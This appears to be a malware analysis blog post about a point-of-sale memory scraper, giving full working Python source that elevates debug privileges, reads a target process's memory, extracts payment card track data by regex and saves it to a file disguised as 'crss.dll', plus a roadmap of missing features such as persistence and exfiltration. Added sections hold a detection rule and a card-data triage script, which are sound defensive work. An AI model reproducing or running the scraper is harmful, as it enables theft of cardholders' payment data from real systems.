Vitali Kremez

Memory Process Scraper: Analysis

12/2/2015

Malware Analysis: Dump Scraper Implementation in Python Using winappdbg, getpass, re, sys

Method of Operation of Scanning explorer.exe for Dump Data:
(1) Show the Windows version and the current architecture (from winappdbg: System.os, System.arch, System.bits)
(2) Create a snapshot of running processes (from winappdbg.System: request_debug_privileges(), scan_processes())
(3) Obtain the local username (from getpass.getuser())
(4) Create a writable file in Application Data
Dump_Writer = open('C:\\Documents and Settings\\'+UserName+'\\Application Data\\\\crss.dll', 'w+')
(5) Obtain all processes that match the requested filenames.
# Elevate privileges
system.request_debug_privileges()
system.scan_processes()
for process, filename in system.find_processes_by_filename("explorer.exe"):
    pid = process.get_pid()
    bits = process.get_bits()
    print pid, bits
(6) Get a memory map of the process.
memoryMap  = process.get_memory_map()
mappedFilenames = process.get_mapped_filenames(memoryMap)
(7) For each memory block in the map, read the address and size of the block, its state (free or allocated), its page protection bits (looking for win32.MEM_COMMIT), and its memory type
(8) Read the data from memory if mbi.has_content() and mbi.State == win32.MEM_COMMIT
Data = process.read(BaseAddress, RegionSize)
(9) Apply a simple regular expression looking for Track2 data
Dump_Regex = re.findall(r'%B\d{0,19}\^[\w\s\/]{2,26}\^\d{7}\w*\?', Data)
Dump_Data.append(Dump_Regex)
(10) Beautify the extracted dump data
(11) Write the dump data into crss.dll
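The steps above are also the scraper's observable footprint on a host: it takes debug privilege, opens another process to read its memory, and drops its output as a .dll-named file under the user's Application Data directory. Those are the behaviours a defender alerts on. The following is an added detection example in Python 3, not code from the post: it runs two checks over a handful of constructed event records modelled loosely on Sysmon ProcessAccess (event 10) and FileCreate (event 11) fields. The event values, the allowlist of trusted readers and the list of system process names are assumptions made for the example; PROCESS_VM_READ is the real Windows access right.

```python
import os

PROCESS_VM_READ = 0x0010  # Windows access right required to read another process's memory

# Names of core Windows processes that dropped files are often named after (assumed list).
SYSTEM_NAMES = {"csrss", "lsass", "smss", "svchost", "winlogon", "services", "explorer"}

# Constructed allowlist of images expected to read other processes' memory.
TRUSTED_READERS = {r"c:\program files\av\scanner.exe"}

# Constructed events, loosely modelled on Sysmon ProcessAccess (10) and FileCreate (11).
EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Users\alice\AppData\Local\Temp\ramscraper.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1410"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\AV\scanner.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1000"},
    {"EventID": 11, "Image": r"C:\Users\alice\AppData\Local\Temp\ramscraper.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\crss.dll"},
    {"EventID": 11, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\vendor\lib.dll"},
]


def levenshtein(a, b):
    """Edit distance, used to catch file names one character off a system process name."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def file_stem(path):
    """Base name without extension, independent of the host OS path separator."""
    return os.path.splitext(path.replace("\\", "/").rsplit("/", 1)[-1])[0].lower()


def lookalike_system_name(path):
    """True when the file name is exactly one edit away from a core process name (e.g. crss vs csrss)."""
    stem = file_stem(path)
    return any(stem != name and levenshtein(stem, name) == 1 for name in SYSTEM_NAMES)


def detect(events):
    """Return (rule, actor, subject) tuples for events matching the scraper's behaviour."""
    alerts = []
    for ev in events:
        if ev["EventID"] == 10:
            # Rule 1: an untrusted image obtained a handle with memory-read rights on another process.
            granted = int(ev["GrantedAccess"], 16)
            if granted & PROCESS_VM_READ and ev["SourceImage"].lower() not in TRUSTED_READERS:
                alerts.append(("memory_read", ev["SourceImage"], ev["TargetImage"]))
        elif ev["EventID"] == 11:
            # Rule 2: a .dll whose name mimics a system process was written under AppData.
            target = ev["TargetFilename"]
            if ("\\appdata\\" in target.lower() and target.lower().endswith(".dll")
                    and lookalike_system_name(target)):
                alerts.append(("lookalike_dll_in_appdata", ev["Image"], target))
    return alerts


if __name__ == "__main__":
    for rule, actor, subject in detect(EVENTS):
        print("%-24s %s -> %s" % (rule, actor, subject))
```

Rule 1 fires on the GrantedAccess mask rather than on a process name because the scraper takes whichever filenames it is given on the command line; the allowlist is what keeps security tools and debuggers quiet. Rule 2 exists because the output file is not a DLL at all, only named like one, and a plain-text file one letter off csrss sitting in Application Data is a cheap, high-signal indicator.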

Missing features are as follows:
(1) Add Registry Persistence
(2) Encode Saved Data
(3) Add Luhn Algorithm
(4) Create a process for this algorithm
(5) Send data to email/C2

import sys
import winappdbg
from winappdbg import System, win32
import re
import getpass

# Show the Windows version and the current architecture.
print "Running on %s for the %s architecture." % (System.os, System.arch)
if System.wow64:
    print "Running in 32 bit emulation mode."
print "From this Python VM we can attach to %d-bit processes." % System.bits

# Create a snapshot of running processes.
system = winappdbg.System()
system.request_debug_privileges()
system.scan_processes()
UserName = getpass.getuser()
# If the newer profile layout (Users\<name>\AppData\Roaming) is in use, the path follows this convention instead:
# Dump_Writer = open('C:\\Users\\'+UserName+'\\AppData\\Roaming\\athena.dll', 'w+')
Dump_Writer = open('C:\\Documents and Settings\\'+UserName+'\\Application Data\\\\crss.dll', 'w+')
Dump_Data = []


# Get all processes that match the requested filenames.
for filename in sys.argv[1:]:
    print "Looking for: %s" % filename
    for process, pathname in system.find_processes_by_filename(filename):
        pid  = process.get_pid()
        bits = process.get_bits()
        print "Dumping memory for process ID %d (%d bits)" % (pid, bits)


        # Get a memory map of the process.
        memoryMap       = process.get_memory_map()
        mappedFilenames = process.get_mapped_filenames(memoryMap)

        # For each memory block in the map...
        for mbi in memoryMap:

            # Address and size of memory block.
            BaseAddress = mbi.BaseAddress
            RegionSize  = mbi.RegionSize

            # State (free or allocated).
            if   mbi.State == win32.MEM_RESERVE:
                State   = "Reserved"
            elif mbi.State == win32.MEM_COMMIT:
                State   = "Committed"
            elif mbi.State == win32.MEM_FREE:
                State   = "Free"
            else:
                State   = "Unknown"

            # Page protection bits (R/W/X/G).
            if mbi.State != win32.MEM_COMMIT:
                Protect = ""
            else:
                if   mbi.Protect & win32.PAGE_NOACCESS:
                    Protect = "--- "
                elif mbi.Protect & win32.PAGE_READONLY:
                    Protect = "R-- "
                elif mbi.Protect & win32.PAGE_READWRITE:
                    Protect = "RW- "
                elif mbi.Protect & win32.PAGE_WRITECOPY:
                    Protect = "RC- "
                elif mbi.Protect & win32.PAGE_EXECUTE:
                    Protect = "--X "
                elif mbi.Protect & win32.PAGE_EXECUTE_READ:
                    Protect = "R-X "
                elif mbi.Protect & win32.PAGE_EXECUTE_READWRITE:
                    Protect = "RWX "
                elif mbi.Protect & win32.PAGE_EXECUTE_WRITECOPY:
                    Protect = "RCX "
                else:
                    Protect = "??? "
                if   mbi.Protect & win32.PAGE_GUARD:
                    Protect += "G"
                else:
                    Protect += "-"
                if   mbi.Protect & win32.PAGE_NOCACHE:
                    Protect += "N"
                else:
                    Protect += "-"
                if   mbi.Protect & win32.PAGE_WRITECOMBINE:
                    Protect += "W"
                else:
                    Protect += "-"

            # Type (file mapping, executable image, or private memory).
            if   mbi.Type == win32.MEM_IMAGE:
                Type    = "Image"
            elif mbi.Type == win32.MEM_MAPPED:
                Type    = "Mapped"
            elif mbi.Type == win32.MEM_PRIVATE:
                Type    = "Private"
            elif mbi.Type == 0:
                Type    = ""
            else:
                Type    = "Unknown"

            # Mapped file name, if any.
            FileName = mappedFilenames.get(BaseAddress, None)

            # Read the data contained in the memory block, if any.
            Data = None
            if mbi.has_content() and mbi.State == win32.MEM_COMMIT:
##                print 'Reading %s-%s' % (
##                    winappdbg.HexDump.address(BaseAddress, bits),
##                    winappdbg.HexDump.address(BaseAddress + RegionSize, bits)
##                )
                Data = process.read(BaseAddress, RegionSize)
                Dump_Regex = re.findall(r'%B\d{0,19}\^[\w\s\/]{2,26}\^\d{7}\w*\?', Data)
                Dump_Data.append(Dump_Regex)
# Beautify: flatten the per-region match lists into one set of unique records.
# The original stringified each list and stripped the brackets and quotes with
# regular expressions, which only ever processed the first non-empty region and
# then tested membership against the file object itself.
Clean_Dump = set()
for matches in Dump_Data:
    for record in matches:
        Clean_Dump.add(record)
for record in sorted(Clean_Dump):
    Dump_Writer.write(record + "\n")
print "Done."
Dump_Writer.close()
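When an incident responder recovers the output file this last step writes (crss.dll in the post), the question is scope: how many distinct cards, which expiry dates and service codes, without copying full PANs into tickets or reports. The following is an added triage example in Python 3, not part of the post's scraper: it parses records matching the post's pattern (the %B<PAN>^<NAME>^<YYMM><service code>...? layout of ISO 7813 Track 1 format B, which the post refers to as Track2) into fields, masks each PAN to its first six and last four digits, and deduplicates cards by a hash of the PAN. The sample file contents are constructed from the published test card numbers and fictitious names.

```python
import hashlib
import re

# Pattern for the records the scraper writes out, with capture groups:
# %B <PAN> ^ <NAME> ^ <YY><MM><service code><discretionary data> ?
RECORD_RE = re.compile(r'%B(\d{0,19})\^([\w\s/]{2,26})\^(\d{2})(\d{2})(\d{3})(\w*)\?')

# Constructed sample of a recovered output file (test card numbers, fictitious names).
SAMPLE_DUMP = """%B4111111111111111^DOE/JOHN^2512101000000000?
%B4111111111111111^DOE/JOHN^2512101000000000?
%B5500000000000004^SMITH/JANE^2703201123456789?
garbage line that is not a record
"""


def mask_pan(pan):
    """Show at most the first six and last four digits, as PCI DSS permits for display."""
    if len(pan) <= 10:
        return "*" * len(pan)
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def parse_record(line):
    """Split one scraped record into fields; returns None if the line does not match."""
    m = RECORD_RE.search(line)
    if m is None:
        return None
    pan, name, yy, mm, service, _discretionary = m.groups()
    return {
        "pan_masked": mask_pan(pan),
        "pan_hash": hashlib.sha256(pan.encode()).hexdigest(),  # dedup key, never the PAN itself
        "pan_len": len(pan),
        "name": name.strip(),
        "expiry": "20%s-%s" % (yy, mm),
        "service_code": service,
    }


def triage(dump_text):
    """Summarise a recovered dump: total records, distinct cards and masked details."""
    cards = []
    seen = set()
    total = 0
    for line in dump_text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        total += 1
        if rec["pan_hash"] in seen:
            continue
        seen.add(rec["pan_hash"])
        cards.append(rec)
    return {"records": total, "unique_cards": len(cards), "cards": cards}


if __name__ == "__main__":
    summary = triage(SAMPLE_DUMP)
    print("%d records, %d distinct cards" % (summary["records"], summary["unique_cards"]))
    for card in summary["cards"]:
        print("  %s exp %s svc %s %s" % (card["pan_masked"], card["expiry"],
                                        card["service_code"], card["name"]))
```

The hash is used only to count duplicates; it is not a safe way to store PANs (the input space is small enough to brute-force), so the summary keeps the masked form and the hash is discarded once the report is written. The expiry dates tell the card brands which cards are still live, which is the first thing they ask for.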

'''
from distutils.core import setup
setup(
    name='ramscraper',
    version='1.0',
    packages=['sys, winappdbg, re, getpass'],
    url='http://www.vkremez.com',
    license='Apache License, Version 2.0',
    author='Administrator',
    author_email='vitali@vkremez.com',
    description='Memory Scraper Emulation'
)
'''